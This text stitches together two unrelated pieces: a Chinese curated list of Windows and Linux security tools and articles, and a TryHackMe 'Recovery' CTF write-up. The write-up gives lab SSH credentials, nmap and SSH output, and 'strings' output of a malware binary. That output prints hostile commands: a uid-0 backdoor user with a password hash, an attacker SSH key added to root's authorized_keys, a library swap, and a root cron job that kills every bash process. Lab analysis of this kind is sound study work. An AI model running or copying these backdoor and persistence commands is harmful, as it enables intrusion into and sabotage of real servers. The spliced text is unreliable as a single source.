- [**1521**星][11m] [PS] [joefitzgerald/packer-windows](https://github.com/joefitzgerald/packer-windows) 使用Packer创建Vagrant boxes的模板
- [**1347**星][1m] [Go] [securitywithoutborders/hardentools](https://github.com/securitywithoutborders/hardentools) 禁用许多有危险的Windows功能
- [**1156**星][1y] [HTML] [nsacyber/windows-secure-host-baseline](https://github.com/nsacyber/Windows-Secure-Host-Baseline) Windows 10和Windows Server 2016 DoD 安全主机基准设置的配置指南
- [**1008**星][6m] [adolfintel/windows10-privacy](https://github.com/adolfintel/windows10-privacy) Win10隐私指南
- [**508**星][17d] [PS] [stefanscherer/packer-windows](https://github.com/stefanscherer/packer-windows) Windows Packer 模板:Win10, Server 2016, 1709, 1803, 1809, 2019, 1903, Insider with Docker
### <a id="8bfd27b42bb75956984994b3419fb582"></a>进程注入
### <a id="1c6069610d73eb4246b58d78c64c9f44"></a>代码注入
### <a id="7c1541a69da4c025a89b0571d8ce73d2"></a>内存模块
### <a id="19cfd3ea4bd01d440efb9d4dd97a64d0"></a>VT&&虚拟化&&Hypbervisor
- [**1348**星][22d] [C] [intel/haxm](https://github.com/intel/haxm) Intel 开源的英特尔硬件加速执行管理器,通过硬件辅助的虚拟化引擎,加速 Windows/macOS 主机上的 IA emulation((x86/ x86_64) )
- [**1011**星][1y] [C] [ionescu007/simplevisor](https://github.com/ionescu007/simplevisor) 英特尔VT-x虚拟机管理程序,简单、可移植。支持Windows和UEFI
- [**717**星][23d] [C++] [tandasat/hyperplatform](https://github.com/tandasat/hyperplatform) 基于Intel VT-x的虚拟机管理程序,旨在在Windows上提供精简的VM-exit过滤平台
- [**570**星][12m] [C] [asamy/ksm](https://github.com/asamy/ksm) 快速、hackable且简单的x64 VT-x虚拟机管理程序,支持Windows和Linux
- 重复区段: [Linux->工具->新添加](#203d00ef3396d68f5277c90279f4ebf3) |
### <a id="c3cda3278305549f4c21df25cbf638a4"></a>内核&&驱动
- [**933**星][9m] [C] [microsoft/windows-driver-frameworks](https://github.com/microsoft/windows-driver-frameworks) Windows驱动框架(WDF)
- [**781**星][19d] [axtmueller/windows-kernel-explorer](https://github.com/axtmueller/windows-kernel-explorer) Windows内核研究工具
- [**510**星][5m] [Py] [rabbitstack/fibratus](https://github.com/rabbitstack/fibratus) Windows内核探索和跟踪工具
- [**479**星][1m] [C] [jkornev/hidden](https://github.com/jkornev/hidden) Windows驱动,带用户模式接口:隐藏文件系统和注册表对象、保护进程等
- [**278**星][12d] [PS] [microsoftdocs/windows-driver-docs](https://github.com/MicrosoftDocs/windows-driver-docs) 官方Windows驱动程序工具包文档
### <a id="920b69cea1fc334bbc21a957dd0d9f6f"></a>注册表
- [**490**星][14d] [Batchfile] [chef-koch/regtweaks](https://github.com/chef-koch/regtweaks) Windows注册表调整(Win 7-Win 10)
- [**288**星][8m] [Py] [williballenthin/python-registry](https://github.com/williballenthin/python-registry) 用于对Windows NT注册表文件进行纯读取访问的Python库
### <a id="d295182c016bd9c2d5479fe0e98a75df"></a>系统调用
- [**725**星][2m] [HTML] [j00ru/windows-syscalls](https://github.com/j00ru/windows-syscalls) Windows 系统调用表(NT/2000/XP/2003/Vista/2008/7/2012/8/10)
- [**328**星][2m] [C] [hfiref0x/syscalltables](https://github.com/hfiref0x/syscalltables) Windows NT x64系统调用表
### <a id="1afda3039b4ab9a3a1f60b179ccb3e76"></a>其他
- [**949**星][3m] [C] [basil00/divert](https://github.com/basil00/divert) 用户模式数据包拦截库,适用于Win 7/8/10
- [**863**星][14d] [C++] [henrypp/simplewall](https://github.com/henrypp/simplewall) 为Windows 过滤平台提供的配置界面
- [**726**星][2m] [Py] [diyan/pywinrm](https://github.com/diyan/pywinrm) Python实现的WinRM客户端
- [**570**星][1m] [C] [hfiref0x/winobjex64](https://github.com/hfiref0x/winobjex64) Windows对象浏览器. x64
- [**463**星][8m] [C#] [microsoft/dbgshell](https://github.com/microsoft/dbgshell) PowerShell编写的Windows调试器引擎前端
- [**418**星][15d] [C] [samba-team/samba](https://github.com/samba-team/samba) 适用于Linux和Unix的标准Windows interoperability程序套件
- [**389**星][2m] [C#] [microsoft/binskim](https://github.com/microsoft/binskim) 二进制静态分析工具,可为PE和ELF二进制格式提供安全性和正确性分析
- [**387**星][19d] [Jupyter Notebook] [microsoft/windowsdefenderatp-hunting-queries](https://github.com/microsoft/windowsdefenderatp-hunting-queries) 在MS Defender ATP中进行高级查询的示例
- [**370**星][27d] [Ruby] [winrb/winrm](https://github.com/winrb/winrm) 在Windows中使用WinRM的功能调用原生对象的SOAP库。Ruby编写
- [**360**星][12d] [C#] [digitalruby/ipban](https://github.com/digitalruby/ipban) 监视Windows/Linux系统的登录失败和不良行为,并封禁对应的IP地址。高度可配置,精简且功能强大。
- [**269**星][12m] [Py] [hakril/pythonforwindows](https://github.com/hakril/pythonforwindows) 简化Python与Windows操作系统交互的库
- [**238**星][5m] [PS] [microsoft/aaronlocker](https://github.com/microsoft/aaronlocker) Windows应用程序白名单
- [**233**星][10m] [Go] [masterzen/winrm](https://github.com/masterzen/winrm) Windows远程命令执行,命令行工具+库,Go编写
- [**232**星][1y] [C++] [ionescu007/simpleator](https://github.com/ionescu007/simpleator) Windows x64用户模式应用程序模拟器
- [**229**星][4m] [C] [tishion/mmloader](https://github.com/tishion/mmloader) 绕过Windows PE Loader,直接从内存中加载DLL模块(x86/x64)
- [**228**星][3m] [C] [leecher1337/ntvdmx64](https://github.com/leecher1337/ntvdmx64) 在64位版本上执行Windows DOS版的 NTVDM
- [**226**星][1y] [C++] [rexdf/commandtrayhost](https://github.com/rexdf/commandtrayhost) 监控Windows systray的命令行工具
- [**210**星][3m] [adguardteam/adguardforwindows](https://github.com/adguardteam/adguardforwindows) Windows系统范围的AdBlocker
- [**208**星][10m] [C] [hzqst/unicorn_pe](https://github.com/hzqst/unicorn_pe) 模拟Windows PE文件的代码执行,基于Unicorn
- [**205**星][3m] [C] [jasonwhite/ducible](https://github.com/jasonwhite/ducible) 使PE和PDB的构建具有可复制性
***
## <a id="3939f5e83ca091402022cb58e0349ab8"></a>文章
### <a id="8e1344cae6e5f9a33e4e5718a012e292"></a>新添加
### <a id="fa89526db1f9373c57ea4ffa1ac8c39f"></a>DEP
- 2019.11 [aliyun] [ARM EXP 开发 - 绕过 DEP 执行 mprotect()](https://xz.aliyun.com/t/6750)
- 2019.07 [codingvision] [Bypassing ASLR and DEP - Getting Shells with pwntools](https://codingvision.net/security/bypassing-aslr-dep-getting-shells-with-pwntools)
- 2019.01 [fuzzysecurity] [MS13-009 Use-After-Free IE8 (DEP)](http://fuzzysecurity.com/exploits/20.html)
- 2019.01 [fuzzysecurity] [BlazeVideo HDTV Player 6.6 Professional SEH&DEP&ASLR](http://fuzzysecurity.com/exploits/11.html)
- 2019.01 [fuzzysecurity] [NCMedia Sound Editor Pro v7.5.1 SEH&DEP&ASLR](http://fuzzysecurity.com/exploits/16.html)
- 2019.01 [fuzzysecurity] [ALLMediaServer 0.8 SEH&DEP&ASLR](http://fuzzysecurity.com/exploits/15.html)
- 2018.12 [360] [CoolPlayer bypass DEP(CVE-2008-3408)分析](https://www.anquanke.com/post/id/167424/)
- 2018.09 [duo] [Weak Apple DEP Authentication Leaves Enterprises Vulnerable to Social Engineering Attacks and Rogue Devices](https://duo.com/blog/weak-apple-dep-authentication-leaves-enterprises-vulnerable-to-social-engineering-attacks-and-rogue-devices)
- 2018.09 [3or] [ARM Exploitation - Defeating DEP - executing mprotect()](https://blog.3or.de/arm-exploitation-defeating-dep-executing-mprotect.html)
- 2018.09 [3or] [ARM Exploitation - Defeating DEP - execute system()](https://blog.3or.de/arm-exploitation-defeating-dep-execute-system.html)
- 2018.06 [pediy] [[原创]Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass Local Buffer Overflow](https://bbs.pediy.com/thread-228537.htm)
- 2018.05 [pediy] [[翻译]DEP缓解技术(一)](https://bbs.pediy.com/thread-226625.htm)
- 2017.12 [360] [利用缓解技术:数据执行保护(DEP)](https://www.anquanke.com/post/id/91266/)
- 2017.12 [0x00sec] [Exploit Mitigation Techniques - Data Execution Prevention (DEP)](https://0x00sec.org/t/exploit-mitigation-techniques-data-execution-prevention-dep/4634/)
- 2017.10 [freebuf] [在64位系统中使用ROP+Return-to-dl-resolve来绕过ASLR+DEP](http://www.freebuf.com/articles/system/149364.html)
- 2017.10 [freebuf] [如何在32位系统中使用ROP+Return-to-dl来绕过ASLR+DEP](http://www.freebuf.com/articles/system/149214.html)
- 2017.08 [pediy] [[原创]利用Ret2Libc挑战DEP——利用ZwSetInformationProcess](https://bbs.pediy.com/thread-220346.htm)
- 2017.06 [360] [ropasaurusrex:ROP入门教程——DEP(下)](https://www.anquanke.com/post/id/86197/)
- 2017.06 [360] [ropasaurusrex:ROP入门教程——DEP(上)](https://www.anquanke.com/post/id/86196/)
- 2017.05 [myonlinesecurity] [fake clothing order Berhanu (PURCHASE DEPARTMENT) using winace files delivers Loki bot](https://myonlinesecurity.co.uk/fake-clothing-order-berhanu-purchase-department-using-winace-files-delivers-loki-bot/)
### <a id="af06263e9a92f6036dc5d4c4b28b9d8c"></a>Procmon
- 2017.06 [lowleveldesign] [How to decode managed stack frames in procmon traces](https://lowleveldesign.org/2017/06/23/how-to-decode-managed-stack-frames-in-procmon-traces/)
- 2017.02 [lowleveldesign] [When procmon trace is not enough](https://lowleveldesign.org/2017/02/20/when-procmon-trace-is-not-enough/)
- 2016.09 [dist67] [Malware: Process Explorer & Procmon](https://www.youtube.com/watch?v=vq12OCVm2-o)
- 2015.06 [guyrleech] [Advanced Procmon Part 2 – Filtering inclusions](https://guyrleech.wordpress.com/2015/06/22/advanced-procmon-part-2-filtering-inclusions/)
- 2014.12 [guyrleech] [Advanced Procmon Part 1 – Filtering exclusions](https://guyrleech.wordpress.com/2014/12/25/advanced-procmon-part-1-filtering-exclusions/)
# <a id="dc664c913dc63ec6b98b47fcced4fdf0"></a>Linux
***
## <a id="a63015576552ded272a242064f3fe8c9"></a>ELF
### <a id="929786b8490456eedfb975a41ca9da07"></a>工具
- [**930**星][15d] [Py] [eliben/pyelftools](https://github.com/eliben/pyelftools) Parsing ELF and DWARF in Python
- [**787**星][2m] [C] [nixos/patchelf](https://github.com/nixos/patchelf) A small utility to modify the dynamic linker and RPATH of ELF executables
- [**411**星][9m] [Assembly] [mewmew/dissection](https://github.com/mewmew/dissection) The dissection of a simple "hello world" ELF binary.
- [**337**星][9m] [Py] [rek7/fireelf](https://github.com/rek7/fireelf) Fileless Linux Malware Framework
- [**277**星][4m] [Shell] [cryptolok/aslray](https://github.com/cryptolok/aslray) Linux ELF x32/x64 ASLR DEP/NX bypass exploit with stack-spraying
- [**233**星][2m] [C] [elfmaster/libelfmaster](https://github.com/elfmaster/libelfmaster) Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools
### <a id="72d101d0f32d5521d5d305e7e653fdd3"></a>文章
- 2019.10 [aliyun] [64 位 elf 的 one_gadget 通杀思路](https://xz.aliyun.com/t/6598)
- 2019.10 [HackersOnBoard] [AFL's Blindspot and How to Resist AFL Fuzzing for Arbitrary ELF Binaries](https://www.youtube.com/watch?v=fhNNPJVlj4A)
- 2019.10 [HackersOnBoard] [Black Hat USA 2016 Intra-Process Memory Protection for App on ARM & X86 Leveraging the ELF ABI](https://www.youtube.com/watch?v=IeBrb1-AtOk)
- 2019.09 [freebuf] [CVE-2018-6924:解析FreeBSD ELF 头导致内核内存泄露](https://www.freebuf.com/vuls/213345.html)
- 2019.07 [quarkslab] [CVE-2018-6924: FreeBSD ELF Header Parsing Kernel Memory Disclosure](https://blog.quarkslab.com/cve-2018-6924-freebsd-elf-header-parsing-kernel-memory-disclosure.html)
- 2019.07 [trendmicro] [A Quick and Efficient Method For Locating the main() function of Linux ELF Malware Variants](https://blog.trendmicro.com/trendlabs-security-intelligence/a-quick-and-efficient-method-for-locating-the-main-function-of-linux-elf-malware-variants/)
- 2019.05 [0x00sec] [Doubt infect ELF](https://0x00sec.org/t/doubt-infect-elf/13605/)
- 2019.04 [guitmz] [Linux ELF Runtime Crypter](https://www.guitmz.com/linux-elf-runtime-crypter/)
- 2019.03 [guitmz] [Running ELF executables from memory](https://www.guitmz.com/running-elf-from-memory/)
- 2019.02 [icyphox] [Python for Reverse Engineering #1: ELF Binaries](https://medium.com/p/e31e92c33732)
- 2019.01 [aliyun] [圣诞老人的ELFs:在没有execve的情况下运行Linux可执行文件](https://xz.aliyun.com/t/3856)
- 2019.01 [freebuf] [Pwntools之DynELF原理探究](https://www.freebuf.com/news/193646.html)
- 2019.01 [rapid7] [Santa's ELFs: Running Linux Executables Without execve](https://blog.rapid7.com/2019/01/03/santas-elfs-running-linux-executables-without-execve/)
- 2018.12 [360] [Linux系统内存执行ELF的多种方式](https://www.anquanke.com/post/id/168791/)
- 2018.12 [ZeroNights] [Yaroslav Moskvin - ELF execution in Linux RAM](https://www.youtube.com/watch?v=Q23nuzZ5YJI)
- 2018.11 [k3170makan] [Introduction to the ELF Format (Part VII): Dynamic Linking / Loading and the .dynamic section](http://blog.k3170makan.com/2018/11/introduction-to-elf-format-part-vii.html)
- 2018.10 [k3170makan] [Introduction to the ELF Format (Part VI) : More Relocation tricks - r_addend execution (Part 3)](http://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi-more.html)
- 2018.10 [k3170makan] [Introduction to The ELF Format (Part VI): The Symbol Table and Relocations (Part 2)](http://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi_18.html)
- 2018.10 [k3170makan] [Introduction to the ELF Format (Part VI) : The Symbol Table and Relocations (Part 1)](http://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi.html)
- 2018.10 [k3170makan] [Introduction to the ELF Format (Part V) : Understanding C start up .init_array and .fini_array sections](http://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html)
***
## <a id="89e277bca2740d737c1aeac3192f374c"></a>工具
### <a id="203d00ef3396d68f5277c90279f4ebf3"></a>新添加
- [**1450**星][2m] [C] [feralinteractive/gamemode](https://github.com/feralinteractive/gamemode) Optimise Linux system performance on demand
- [**1413**星][21d] [C++] [google/nsjail](https://github.com/google/nsjail) A light-weight process isolation tool, making use of Linux namespaces and seccomp-bpf syscall filters (with help of the kafel bpf language)
- [**895**星][29d] [C] [buserror/simavr](https://github.com/buserror/simavr) simavr is a lean, mean and hackable AVR simulator for linux & OSX
- [**759**星][1m] [Py] [korcankaraokcu/pince](https://github.com/korcankaraokcu/pince) A reverse engineering tool that'll supply the place of Cheat Engine for linux
- [**741**星][2m] [C] [yrp604/rappel](https://github.com/yrp604/rappel) A linux-based assembly REPL for x86, amd64, armv7, and armv8
- [**731**星][17d] [C] [strace/strace](https://github.com/strace/strace) strace is a diagnostic, debugging and instructional userspace utility for Linux
- [**570**星][12m] [C] [asamy/ksm](https://github.com/asamy/ksm) 快速、hackable且简单的x64 VT-x虚拟机管理程序,支持Windows和Linux
- 重复区段: [Windows->工具->VT](#19cfd3ea4bd01d440efb9d4dd97a64d0) |
- [**565**星][12d] [C++] [intel/linux-sgx](https://github.com/intel/linux-sgx) Intel SGX for Linux*
- [**560**星][2m] [Py] [autotest/autotest](https://github.com/autotest/autotest) Fully automated tests on Linux
- [**536**星][5m] [C++] [nytrorst/shellcodecompiler](https://github.com/nytrorst/shellcodecompiler) 将C/C ++样式代码编译成一个小的、与位置无关且无NULL的Shellcode,用于Windows(x86和x64)和Linux(x86和x64)
- [**509**星][8m] [C] [iovisor/ply](https://github.com/iovisor/ply) Dynamic Tracing in Linux
- [**468**星][9d] [C] [libreswan/libreswan](https://github.com/libreswan/libreswan) an Internet Key Exchange (IKE) implementation for Linux.
- [**441**星][12d] [C] [facebook/openbmc](https://github.com/facebook/openbmc) OpenBMC is an open software framework to build a complete Linux image for a Board Management Controller (BMC).
- [**405**星][10m] [Shell] [microsoft/linux-vm-tools](https://github.com/microsoft/linux-vm-tools) Hyper-V Linux Guest VM Enhancements
- [**393**星][2m] [Shell] [yadominjinta/atilo](https://github.com/yadominjinta/atilo) Linux installer for termux
- [**354**星][2m] [C] [seccomp/libseccomp](https://github.com/seccomp/libseccomp) an easy to use, platform independent, interface to the Linux Kernel's syscall filtering mechanism
- [**331**星][5m] [Go] [capsule8/capsule8](https://github.com/capsule8/capsule8) 对云本地,容器和传统的基于 Linux 的服务器执行高级的行为监控
- [**282**星][2m] [Py] [facebook/fbkutils](https://github.com/facebook/fbkutils) A variety of utilities built and maintained by Facebook's Linux Kernel Team that we wish to share with the community.
- [**228**星][8m] [C] [wkz/ply](https://github.com/wkz/ply) Light-weight Dynamic Tracer for Linux
***
## <a id="f6d78e82c3e5f67d13d9f00c602c92f0"></a>文章
### <a id="bdf33f0b1200cabea9c6815697d9e5aa"></a>新添加
# 贡献
内容为系统自动导出, 有任何问题请提issue |
# Recovery
Not your conventional CTF
[Recovery](https://tryhackme.com/room/recovery)
## Topic's
- Network Enumeration
- Reverse Engineering (Bash)
- Exploiting Crontab
- Reverse Engineering (Cpp)
## Appendix archive
Password: `1 kn0w 1 5h0uldn'7!`
## Task 1 Help Alex!
Hi, it's me, your friend Alex.
I'm not going to beat around the bush here; I need your help. As you know I work at a company called Recoverysoft. I work on the website side of things, and I setup a Ubuntu web server to run it. Yesterday one of my work colleagues sent me the following email:
```
Hi Alex,
A recent security vulnerability has been discovered that affects the web server. Could you please run this binary on the server to implement the fix?
Regards
- Teo
```
Attached was a linux binary called fixutil. As instructed, I ran the binary, and all was good. But this morning, I tried to log into the server via SSH and I received this message:
```
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
```
It turns out that Teo got his mail account hacked, and fixutil was a targeted malware binary specifically built to destroy my webserver!
when I opened the website in my browser I get some crazy nonsense. The webserver files had been encrypted! Before you ask, I don't have any other backups of the webserver (I know, I know, horrible practice, etc...), I don't want to tell my boss, he'll fire me for sure.
**Please access the web server and repair all the damage caused by fixutil. You can find the binary in my home directory. Here are my ssh credentials:**
Username: `alex`
Password: `madeline`
**I have setup a control panel to track your progress on port 1337.** Access it via your web browser. As you repair the damage, you can refresh the page to receive those "flags" I know you love hoarding.
Good luck!
- Your friend Alex
```
kali@kali:~/CTFs/tryhackme/Recovery$ sudo nmap -p- -A -sS -sC -sV -O 10.10.164.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-24 20:57 CEST
Nmap scan report for 10.10.164.149
Host is up (0.039s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 55:17:c1:d4:97:ba:8d:82:b9:60:81:39:e4:aa:1e:e8 (RSA)
| 256 8d:f5:4b:ab:23:ed:a3:c0:e9:ca:90:e9:80:be:14:44 (ECDSA)
|_ 256 3e:ae:91:86:81:12:04:e4:70:90:b1:40:ef:b7:f1:b6 (ED25519)
80/tcp open http Apache httpd 2.4.43 ((Unix))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.43 (Unix)
|_http-title: Site doesn't have a title (text/html).
1337/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Help Alex!
65499/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:b6:aa:93:8d:aa:b7:f3:af:71:9d:7f:c5:83:1d:63 (RSA)
| 256 64:98:14:38:ff:38:05:7e:25:ae:5d:33:2d:b6:78:f3 (ECDSA)
|_ 256 ef:2e:60:3a:de:ea:2b:25:7d:26:da:b5:6b:5b:c4:3a (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/24%OT=22%CT=1%CU=32782%PV=Y%DS=2%DC=T%G=Y%TM=5F9479
OS:5F%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST
OS:11NW7%O6=M508ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=3F%W=FAF0%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=3F%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=3F%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 37.45 ms 10.8.0.1
2 37.75 ms 10.10.164.149
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.54 seconds
```
```
kali@kali:~/CTFs/tryhackme/Recovery$ ssh [email protected] -p 22 /bin/sh
[email protected]'s password:
sed '$d' .bashrc
```
```bash
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
case $- in
*i*) ;;
*) return;;
esac
# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar
# make less more friendly for non-text input files, see lesspipe(1)
#[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
xterm-color|*-256color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
# We have color support; assume it's compliant with Ecma-48
# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
# a case would tend to support setf rather than setaf.)
color_prompt=yes
else
color_prompt=
fi
fi
if [ "$color_prompt" = yes ]; then
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
;;
*)
;;
esac
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
#alias dir='dir --color=auto'
#alias vdir='vdir --color=auto'
#alias grep='grep --color=auto'
#alias fgrep='fgrep --color=auto'
#alias egrep='egrep --color=auto'
fi
# colored GCC warnings and errors
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'
# some more ls aliases
#alias ll='ls -l'
#alias la='ls -A'
#alias l='ls -CF'
# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
if [ -f /usr/share/bash-completion/bash_completion ]; then
. /usr/share/bash-completion/bash_completion
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi
```
```
rm -rf .bashrc
ls
fixutil
```
```
kali@kali:~/CTFs/tryhackme/Recovery$ ssh [email protected] -p 22
[email protected]'s password:
Linux recoveryserver 4.15.0-106-generic #107-Ubuntu SMP Thu Jun 4 11:27:52 UTC 2020 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
alex@recoveryserver:~$ ls
fixutil
alex@recoveryserver:~$ scp fixutil [email protected]:/home/kali/CTFs/tryhackme/Recovery
The authenticity of host '10.8.106.222 (10.8.106.222)' can't be established.
ECDSA key fingerprint is SHA256:xCE0Cpa4vJaXG1mwn7ciMO55E0R11HvAmXVl2ymdG+Y.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.8.106.222' (ECDSA) to the list of known hosts.
[email protected]'s password:
fixutil 100% 36KB 450.2KB/s 00:00
alex@recoveryserver:~$
```
```
kali@kali:~/CTFs/tryhackme/Recovery$ chmod +x fixutil
kali@kali:~/CTFs/tryhackme/Recovery$ strings fixutil
/lib64/ld-linux-x86-64.so.2
libc.so.6
fopen
fclose
system
fwrite
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
__cxa_finalize
web_location
encryption_key_dir
__stack_chk_fail
GetWebFiles
opendir
strcmp
strlen
malloc
exit
strcpy
strncat
closedir
readdir
XORFile
fopen
fseek
ftell
fread
fclose
fwrite
XOREncryptWebFiles
mkdir
fprintf
free
LogIncorrectAttempt
system
time
srand
chmod
libc.so.6
__xstat
GLIBC_2.4
GLIBC_2.2.5
u+UH
abcdefghH
ijklmnopH
qrstuvwxH
yzABCDEFH
GHIJKLMNH
OPQRSTUVH
WXYZ
dH34%(
/usr/local/apache2/htdocs/
/opt/.fixutil/
/opt/.fixutil/backup.txt
/bin/mv /tmp/logging.so /lib/x86_64-linux-gnu/oldliblogging.so
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC4U9gOtekRWtwKBl3+ysB5WfybPSi/rpvDDfvRNZ+BL81mQYTMPbY3bD6u2eYYXfWMK6k3XsILBizVqCqQVNZeyUj5x2FFEZ0R+HmxXQkBi+yNMYoJYgHQyngIezdBsparH62RUTfmUbwGlT0kxqnnZQsJbXnUCspo0zOhl8tK4qr8uy2PAG7QbqzL/epfRPjBn4f3CWV+EwkkkE9XLpJ+SHWPl8JSdiD/gTIMd0P9TD1Ig5w6F0f4yeGxIVIjxrA4MCHMmo1U9vsIkThfLq80tWp9VzwHjaev9jnTFg+bZnTxIoT4+Q2gLV124qdqzw54x9AmYfoOfH9tBwr0+pJNWi1CtGo1YUaHeQsA8fska7fHeS6czjVr6Y76QiWqq44q/BzdQ9klTEkNSs+2sQs9csUybWsXumipViSUla63cLnkfFr3D9nzDbFHek6OEk+ZLyp8YEaghHMfB6IFhu09w5cPZApTngxyzJU7CgwiccZtXURnBmKV72rFO6ISrus= root@recovery
/root/.ssh/authorized_keys
/usr/sbin/useradd --non-unique -u 0 -g 0 security 2>/dev/null
/bin/echo 'security:$6$he6jYubzsBX1d7yv$sD49N/rXD5NQT.uoJhF7libv6HLc0/EZOqZjcvbXDoua44ZP3VrUcicSnlmvWwAFTqHflivo5vmYjKR13gZci/' | /usr/sbin/chpasswd -e
/opt/brilliant_script.sh
#!/bin/sh
for i in $(ps aux | grep bash | grep -v grep | awk '{print $2}'); do kill $i; done;
/etc/cron.d/evil
* * * * * root /opt/brilliant_script.sh 2>&1 >/tmp/testlog
:*3$"
GCC: (Ubuntu 9.3.0-10ubuntu2) 9.3.0
/usr/lib/gcc/x86_64-linux-gnu/9/include
/usr/include/x86_64-linux-gnu/bits
/usr/include/x86_64-linux-gnu/bits/types
/usr/include
replacelogging.c
stddef.h
types.h
struct_FILE.h
FILE.h
stdio.h
sys_errlist.h
struct_timespec.h
dirent.h
time.h
unistd.h
getopt_core.h
stat.h
dirent.h
ssh_key
_shortbuf
_IO_lock_t
stderr
_IO_buf_end
XORFile
optopt
_IO_write_end
_freeres_list
st_blksize
_flags
web_location
encryption_file
_markers
__nlink_t
max_amnt_webfiles
d_name
__timezone
__ino_t
stdout
_IO_save_end
/home/moodr/Boxes/recovery/fixutil
opterr
_IO_codecvt
long long unsigned int
st_blocks
d_reclen
sys_errlist
_IO_backup_base
sys_nerr
f_contents
webfile_w
_fileno
stat
tv_nsec
index_of_encryption_key
__mode_t
d_type
webfile_r
_IO_read_base
st_gid
stdin
st_mode
st_nlink
attempt
timespec
__daylight
_IO_marker
_IO_read_ptr
replacelogging.c
st_ino
_IO_write_base
long long int
_IO_save_base
__dev_t
webfile
optind
__syscall_slong_t
